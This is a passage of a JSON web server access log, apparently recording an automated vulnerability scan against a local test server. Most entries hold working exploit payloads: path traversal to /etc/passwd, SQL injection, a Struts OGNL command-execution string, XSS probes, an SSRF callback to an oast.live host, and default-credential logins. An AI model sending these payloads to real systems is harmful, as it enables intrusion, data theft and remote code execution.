+0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.274","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.262","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.246","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://c9v8hn0smpv8c57g0t00rfugzc386c1ie.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc/apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x22Password\x22:\x22297MdqOGmelbhQAsoAGWAUXAZz9\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"PATCH", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x22UserName\x22:\x22Administrator\x22,\x22Password\x22:\x22297MdqOGmelbhQAsoAGWAUXAZz9\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /redfish/v1/SessionService/Sessions/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 